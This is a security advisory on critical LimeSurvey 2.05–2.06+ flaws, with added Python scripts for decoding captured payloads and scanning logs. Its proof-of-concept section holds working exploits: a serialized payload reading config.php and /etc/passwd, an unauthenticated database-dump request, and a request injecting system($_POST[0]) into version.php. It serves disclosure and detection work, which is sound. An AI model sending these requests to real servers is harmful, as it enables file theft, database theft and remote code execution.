Multiple critical vulnerabilities in Lime Survey

SEC Consult Vulnerability Lab Security Advisory < 20151022-0 >

=======================================================================

title: Multiple critical vulnerabilities

product: Lime Survey

vulnerable version: 2.05 up to 2.06+ Build 151014

fixed version: 2.06+ Build 151016

CVE number:

impact: critical

homepage: www.limesurvey.org

found: 2015-10-12

by: P. Morimoto (Office Bangkok)

SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore
Vienna (HQ) - Vilnius - Zurich - Bangkok
www.sec-consult.com

=======================================================================

 

Vendor description:
-------------------
Lime Survey allows users to quickly create intuitive, powerful,
online question-and-answer surveys that can work for tens to thousands
of participants without much effort. The survey software itself is
self-guiding for the respondents who are participating.
Lime Survey has surpassed 1,500,000 downloads and is used by a huge number of
private persons, big companies, academic facilities and governmental
institutions around the world.

URL: www.limesurvey.org/en/about-limesurvey/references

 

 

Business recommendation:
------------------------
By combining the vulnerabilities documented in this advisory,
unauthenticated remote attackers can completely compromise the Lime
Survey application server:

- Arbitrary local files can be downloaded
- The entire Lime Survey database can be accessed
- Arbitrary PHP code can be executed

SEC Consult recommends not to use this software until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.

 

 

Vulnerability overview/description:
-----------------------------------
Due to the lack of function level access control, many administrative
functions in Lime Survey can be accessed by remote attackers without
prior authentication.

Moreover, the application does not validate some user input properly.
Unauthenticated attackers can pass specially crafted data to these entry
points, resulting in the following vulnerabilities.

1. Unauthenticated local file disclosure
An attacker can craft a malicious PHP serialized string containing a list of
arbitrary files. This list can be sent to the Lime Survey backup feature
for downloading without prior authentication.

Any file readable with the privileges of the web server user
can be downloaded.

2. Unauthenticated database dump
An attacker can request the database backup feature without authentication.
The whole Lime Survey database can be downloaded, including the username and
hashed password of the administrator account.

3. Unauthenticated arbitrary remote code execution
An attacker can inject arbitrary PHP code into the application source code,
allowing them to plant a web backdoor on the underlying web server.

4. Multiple reflected cross-site scripting
The application is prone to multiple reflected cross-site scripting
vulnerabilities.

 

 

Proof of concept:
-----------------
The vendor kindly asked SEC Consult to give people enough time to update
their installations.

Because of the high risk of these vulnerabilities, the proof of concept
section had been removed from this advisory.

Update 2016-09-29: PoC released, see below.

 

1. Unauthenticated local file disclosure
First, generate the list of files for the PHP serialized payload.

$ cat limesurvey-lfi.php
<?php
$pwn = new stdClass; // dummy object; only its "file" property is read by the backup feature
$pwn->file = '/application/config/config.php';
$pwn2 = new stdClass;
$pwn2->file = '/../../../../../../../../../etc/passwd';

echo base64_encode(serialize([$pwn, $pwn2])); // value for the datasupdateinfo parameter

 

Then submit the generated value in an unauthenticated request as the datasupdateinfo parameter.

HTTP Request:
POST /index.php/admin/update/backup HTTP/1.1
Host: <host>
[..deducted..]
Cookie: YII_CSRF_TOKEN=x;
Content-Type: application/x-www-form-urlencoded
Content-Length: 264

YII_CSRF_TOKEN=x&destinationBuild=x&datasupdateinfo=YToyOntpOjA7Tzo4OiJzdGRDbGFzcyI6MTp7czo0OiJmaWxlIjtzOjMwOiIvYXBwbGljYXRpb24vY29uZmlnL2NvbmZpZy5waHAiO31pOjE7Tzo4OiJzdGRDbGFzcyI6MTp7czo0OiJmaWxlIjtzOjM4OiIvLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCI7fX0=

HTTP Response:
HTTP/1.1 200 OK
Date: Mon, 12 Oct 2015 19:37:27 GMT
Set-Cookie: PHPSESSID=4fr25208e91ap3ith6beagg9l3; path=/; HttpOnly
[..deducted..]

<h2 class="maintitle">Creating file backup</h2>


<div class="updater-background">
    <p class="success " style="text-align: left;">
        <strong>File backup created: </strong>
        <br/>
        /var/www/limesurvey/tmp/LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip<br/>
        <a class="btn btn-success" href="http://<host>/tmp/LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip" title="Download this file">Download this file</a>
[..deducted..]

$ unzip -l LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip
Archive:  LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip
  Length     Date   Time    Name
 --------    ----   ----    ----
     2345  10-12-15 13:33   application/config/config.php
     1148  10-12-15 13:22   ../../../../../../../../../etc/passwd
 --------                   -------
     3493                   2 files
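As an added defender-side example (not part of the advisory and not LimeSurvey's own code), the following Python script does what an incident responder would do with a captured datasupdateinfo value: decode it, list the files the request asked for, and check each one against the application root with the kind of path-confinement test that the backup feature was missing. The serialized value is the one from the request above, the application root /var/www/limesurvey is taken from the response above, and the parser covers only the PHP-serialize subset the payload uses (integers, strings, arrays, objects); all function names are my own.

```python
import base64
import posixpath

# Constructed sample: the datasupdateinfo value from the captured request in
# the advisory's PoC 1, and the application root shown in the response.
CAPTURED_DATASUPDATEINFO = "YToyOntpOjA7Tzo4OiJzdGRDbGFzcyI6MTp7czo0OiJmaWxlIjtzOjMwOiIvYXBwbGljYXRpb24vY29uZmlnL2NvbmZpZy5waHAiO31pOjE7Tzo4OiJzdGRDbGFzcyI6MTp7czo0OiJmaWxlIjtzOjM4OiIvLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCI7fX0="
APP_ROOT = "/var/www/limesurvey"


def _parse(s, i):
    """Parse one PHP-serialized value starting at s[i]; return (value, next_index).

    Supports the subset used by the payload: integers (i:), strings (s:),
    arrays (a:) and objects (O:). Objects become dicts with a "__class" key.
    """
    t = s[i]
    if t == "i":
        end = s.index(";", i)
        return int(s[i + 2:end]), end + 1
    if t == "s":
        colon = s.index(":", i + 2)
        n = int(s[i + 2:colon])
        start = colon + 2                          # skip ':"'
        return s[start:start + n], start + n + 2   # skip '";'
    if t == "a":
        colon = s.index(":", i + 2)
        n = int(s[i + 2:colon])
        j = colon + 2                              # skip ':{'
        out = {}
        for _ in range(n):
            k, j = _parse(s, j)
            v, j = _parse(s, j)
            out[k] = v
        return out, j + 1                          # skip '}'
    if t == "O":
        colon = s.index(":", i + 2)
        name_len = int(s[i + 2:colon])
        name = s[colon + 2:colon + 2 + name_len]
        j = colon + 2 + name_len + 2               # skip '":'
        colon2 = s.index(":", j)
        n = int(s[j:colon2])
        j = colon2 + 2                             # skip ':{'
        obj = {"__class": name}
        for _ in range(n):
            k, j = _parse(s, j)
            v, j = _parse(s, j)
            obj[k] = v
        return obj, j + 1                          # skip '}'
    raise ValueError(f"unsupported serialized type {t!r} at offset {i}")


def parse_php_serialized(text):
    """Parse a complete PHP-serialized document; reject trailing garbage."""
    value, end = _parse(text, 0)
    if end != len(text):
        raise ValueError("trailing data after serialized value")
    return value


def requested_files(value):
    """Collect every 'file' property found anywhere in the parsed structure."""
    found = []
    if isinstance(value, dict):
        if isinstance(value.get("file"), str):
            found.append(value["file"])
        for v in value.values():
            found.extend(requested_files(v))
    return found


def confine_to_root(root, requested):
    """Return the normalized absolute path if `requested` stays inside `root`, else None.

    The check is lexical (posixpath.normpath); on a live system also resolve
    symlinks with os.path.realpath before comparing, so a link inside the
    root cannot point outside it.
    """
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, requested.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def triage_datasupdateinfo(b64_value, app_root):
    """Decode a captured datasupdateinfo value and classify each requested file.

    Returns a list of (requested_path, resolved_path_or_None); None marks a
    path that escapes the application root.
    """
    # PHP string lengths are byte counts, so decode as latin-1 (1 byte == 1 char).
    raw = base64.b64decode(b64_value, validate=True).decode("latin-1")
    items = parse_php_serialized(raw)
    return [(p, confine_to_root(app_root, p)) for p in requested_files(items)]


if __name__ == "__main__":
    for requested, resolved in triage_datasupdateinfo(CAPTURED_DATASUPDATEINFO, APP_ROOT):
        verdict = "inside root" if resolved else "ESCAPES ROOT"
        print(f"{verdict:12} {requested}")
```

Run against the captured value, the script reports config.php as inside the root and the /etc/passwd entry as escaping it. The same confine_to_root check, applied before any file is added to the archive, is the input-side fix; the access-control side (requiring an authenticated administrator for the backup action at all) is the other half and is independent of it.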

 

2. Unauthenticated database dump

HTTP Request:

POST /index.php/admin/update/step3 HTTP/1.1
Host: <host>
[..deducted..]
Cookie: YII_CSRF_TOKEN=x;
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

YII_CSRF_TOKEN=x

HTTP Response:
HTTP/1.1 200 OK
[..deducted..]
    <div class="successtitle"> Creating database backup...</div>
    <p class="success">DB backup created: /var/www/limesurvey/tmp/LimeSurvey_database_backup_2015-10-16_00763f2a6579925ae1daf39239e7aa1b.zip</p>
[..deducted..]

 

The entire Lime Survey database is then downloadable via
http://<host>/tmp/LimeSurvey_database_backup_2015-10-16_00763f2a6579925ae1daf39239e7aa1b.zip

 

3. Unauthenticated arbitrary remote code execution

HTTP Request:

POST /index.php/admin/update/step4 HTTP/1.1
Host: <host>
[..deducted..]
Cookie: YII_CSRF_TOKEN=x;
Content-Type: application/x-www-form-urlencoded

YII_CSRF_TOKEN=x&destinationBuild=151014';system($_POST[0]);phpinfo();//&datasupdateinfo=YToxOntpOjA7Tzo4OiJzdGRDbGFzcyI6MTp7czo0OiJmaWxlIjtzOjMwOiIvYXBwbGljYXRpb24vY29uZmlnL2NvbmZpZy5waHAiO319&access_token=<ComfortUpdate_Token>

 

The ComfortUpdate server appears to cast the value to an integer,
(int) "151014';system($_POST[0]);phpinfo();//&" => 151014, and returns a valid .zip update,
but the local update code writes the raw user input $destinationBuild => "151014';system($_POST[0]);phpinfo();//&"
into version.php.

Next, just request any page, for example the homepage of Lime Survey.
The injected phpinfo() is executed, demonstrating the unauthenticated RCE,
because version.php is automatically included on almost every page.
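For detection, here is an added Python example (not from the advisory and not part of LimeSurvey) that scans web server access-log lines for the request pattern behind PoC 1 to 3: POSTs to the admin/update backup, step3 and step4 actions, followed by a download of a generated archive from /tmp/. The log lines are constructed in Apache combined format, the client addresses are documentation-range values, the survey id is made up, and the rule names are my own.

```python
import re

# Constructed sample access-log lines (Apache "combined" format) modelled on
# the advisory's PoC traffic. Addresses and the survey id are invented.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Oct/2015:19:37:27 +0000] "POST /index.php/admin/update/backup HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Oct/2015:19:37:41 +0000] "GET /tmp/LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip HTTP/1.1" 200 3493 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Oct/2015:19:40:02 +0000] "GET /index.php/survey/index/sid/12345 HTTP/1.1" 200 18231 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Oct/2015:19:45:10 +0000] "POST /index.php/admin/update/step4 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# One combined-format line: client, identity, user, [timestamp], "METHOD path proto", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# (rule name, HTTP method, path pattern). Each rule maps to one stage of the
# advisory's PoC chain; both together are the complete backup-and-fetch sequence.
RULES = [
    # ComfortUpdate actions used in PoC 1-3 (backup, step3, step4).
    ("comfortupdate-action", "POST",
     re.compile(r"^/index\.php/admin/update/(backup|step3|step4)(?:[/?]|$)")),
    # Retrieval of a generated backup archive from the web-accessible tmp/ directory.
    ("backup-archive-download", "GET",
     re.compile(r"^/tmp/LimeSurvey_(files|database)_backup_[^/]+\.zip$")),
]


def parse_line(line):
    """Return the parsed fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_log(text):
    """Evaluate every rule against every parsable line; return a list of findings."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for rule, method, pattern in RULES:
            if rec["method"] == method and pattern.search(rec["path"]):
                findings.append({
                    "ip": rec["ip"], "ts": rec["ts"], "rule": rule,
                    "path": rec["path"], "status": rec["status"],
                })
    return findings


def suspicious_sources(findings):
    """Clients that triggered every rule, i.e. called an update action and then
    fetched an archive: the full PoC sequence rather than a single admin request."""
    rules_by_ip = {}
    for f in findings:
        rules_by_ip.setdefault(f["ip"], set()).add(f["rule"])
    return sorted(ip for ip, rules in rules_by_ip.items() if len(rules) == len(RULES))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f'{f["ts"]}  {f["ip"]:15}  {f["rule"]:24}  {f["status"]}  {f["path"]}')
    print("sources completing the chain:", suspicious_sources(found))
```

Legitimate ComfortUpdate use by an administrator produces the same requests, so flagged sources should be correlated with admin login sessions rather than treated as alerts on their own; a client that never authenticated yet hits these actions is the case this advisory describes. Access logs do not contain POST bodies, so the datasupdateinfo and destinationBuild values of PoC 1 and 3 are only visible with request-body logging or a WAF; for PoC 3 specifically, comparing the installed version.php against the shipped copy is the most direct check for a modified file.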

 

4. Multiple reflected cross-site scripting
File: application/views/admin/update/_ajaxVariables.php:23:
File: application/views/admin/update/_ajaxVariables.php:30:
File: application/views/admin/update/_ajaxVariables.php:34: